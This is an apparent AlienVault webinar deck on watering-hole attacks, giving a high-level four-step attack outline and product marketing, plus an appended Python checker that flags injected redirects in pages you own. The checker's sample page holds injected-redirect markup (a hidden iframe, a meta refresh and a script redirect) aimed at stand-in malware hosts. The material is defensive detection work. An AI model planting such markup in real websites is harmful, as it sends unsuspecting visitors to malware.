Watering Hole Attacks: Detect End-User Compromise Before the Damage is Done

Attackers are becoming increasingly skilled at planting malicious code on websites frequented by their desired targets, commonly called "watering hole" attacks. These can be very difficult to detect since they happen as users are going about their normal business. Join us for a technical demo to watch a live example of this attack and how to detect it immediately using AlienVault USM.

Published in: Technology
  • Watering hole attack variations have been around for several years, but current techniques became visible in 2012

    They are used to target specific industries, regions, or companies by compromising the sites the target group uses frequently.

    An alternative to phishing attacks; they likely capture more victims than phishing

    For example, an attack from a couple of years ago targeted an iOS mobile developer forum and snared developers from Apple, Twitter, and Facebook
  • Delivers 8 coordinated rulesets, fueled by the collective power of the Open Threat Exchange, to drive the USM security capabilities and identify the latest threats, resulting in the broadest view of attacker techniques and effective defenses.
  • Watering Hole Attacks: Detect End-User Compromise Before the Damage is Done

    1. Live Demo: Get Complete Security Visibility in Under 1 Hour
    2. Watering Hole Attack in 4 Easy Steps (@AlienVault)
       1. Determine Target Group
       • Attacker identifies websites to target
         - Based on observation or guessing
         - Compromising a well-known, legitimate site avoids blacklist issues
       • Examples
         - Compromise a desirable applet
         - Redirect visitors to malicious site
         - Inject
    3. Watering Hole Attack in 4 Easy Steps
       2. Identify Vulnerabilities on those Websites
       • Test web servers, ad servers, web apps, etc. for vulnerabilities to exploit
       3. Inject Threat into Website
       • For example, inject HTML or JavaScript to redirect victims to sites hosting malware
    4. Watering Hole Attack in 4 Easy Steps
       4. Sit in the Tall Grass and Wait for Targets to Come to You
         - Redirected from compromised site
         - Eventually compromised by download of malware
    5. USM Product Capabilities (USM, powered by AV Labs Threat Intelligence)
       ASSET DISCOVERY
       • Active Network Scanning
       • Passive Network Scanning
       • Asset Inventory
       • Host-based Software Inventory
       VULNERABILITY ASSESSMENT
       • Continuous Vulnerability Monitoring
       • Authenticated / Unauthenticated Active Scanning
       BEHAVIORAL MONITORING
       • Log Collection
       • Netflow Analysis
       • Service Availability Monitoring
       SECURITY INTELLIGENCE
       • SIEM Event Correlation
       • Incident Response
       THREAT DETECTION
       • Network IDS
       • Host IDS
       • Wireless IDS
       • File Integrity Monitoring
    6. AlienVault Labs Threat Intelligence: Coordinated Analysis, Actionable Guidance
       Weekly updates that cover all your coordinated rule sets:
       • Network-based IDS signatures
       • Host-based IDS signatures
       • Asset discovery and inventory database updates
       • Vulnerability database updates
       • Event correlation rules
       • Report modules and templates
       • Incident response templates / "how to" guidance for each alarm
       • Plug-ins to accommodate new data sources
       Fueled by the collective power of AlienVault's Open Threat Exchange (OTX)
    7. AlienVault Labs Threat Intelligence: Coordinated Analysis, Actionable Guidance
       • Updates every 30 minutes
       • 200-350,000 IPs validated daily
       • 8,000 collection points
       • 140 countries
    8. Unified Security Management: Complete. Simple. Affordable.
       Delivery options: hardware, virtual, or cloud-based appliances; an open-source version (OSSIM) is also available.
       AlienVault USM provides the five essential security capabilities in one, pre-integrated platform:
       • Unified Security Management (USM) Platform
       • AlienVault Labs Threat Intelligence
       • AlienVault Open Threat Exchange
    9. More Questions? Email Hello@alienvault.com. Now for some Q&A…
       Test Drive AlienVault USM: Download a Free 30-Day Trial at http://www.alienvault.com/free-trial
       Try our Interactive Demo Site: http://www.alienvault.com/live-demo-site
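
As an added example (not AlienVault's code and not part of the deck), a content-baseline check in the spirit of the File Integrity Monitoring bullet, aimed at step 3 of the attack: it parses one of your own site's pages and reports every script, iframe, meta-refresh or JavaScript `location` target whose host is not on an allowlist of hosts the page is expected to reference. The HTML, hosts and allowlist are constructed sample data.

```python
"""Flag injected redirects in a page you own by comparing referenced hosts
against an allowlist. Sample page, hosts and allowlist are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _RefCollector(HTMLParser):
    """Collect script/iframe/meta-refresh targets plus inline script bodies."""

    def __init__(self):
        super().__init__()
        self.refs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe", "frame", "embed") and a.get("src"):
            self.refs.append(a["src"])
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s;]+)", a.get("content", ""), re.I)
            if m:
                self.refs.append(m.group(1))
        if tag == "script":                      # inline only if no src attribute
            self._in_script = not a.get("src")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


# JS-driven redirects: window.location = "...", location.href = "...", etc.
_LOC = re.compile(r"""(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)""")


def find_unexpected_refs(html: str, allowed_hosts: set) -> list:
    """Return sorted hostnames the page references that are not allowlisted."""
    p = _RefCollector()
    p.feed(html)
    targets = list(p.refs)
    for body in p.inline:
        targets += _LOC.findall(body)
    bad = set()
    for t in targets:
        host = urlparse(t).hostname          # relative URL -> None (same-origin)
        if host and host.lower() not in allowed_hosts:
            bad.add(host.lower())
    return sorted(bad)


# Constructed sample: a forum page with an injected meta refresh, a hidden
# iframe and an inline script redirect (198.51.100.23 is a documentation IP).
SAMPLE_PAGE = """<html><head><title>Dev forum</title>
<script src="https://cdn.forum.example/app.js"></script>
<meta http-equiv="refresh" content="0; url=http://198.51.100.23/update.php">
</head><body>
<iframe src="http://exploit.invalid/landing" width="0" height="0"></iframe>
<script>window.location.href="http://exploit.invalid/landing";</script>
</body></html>"""
ALLOWED = {"forum.example", "cdn.forum.example"}
```

Run it periodically against a fetched copy of each monitored page and raise an alarm when the returned list is non-empty; it will not catch obfuscated redirects, so pair it with the network IDS and file-hash checks the deck lists.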
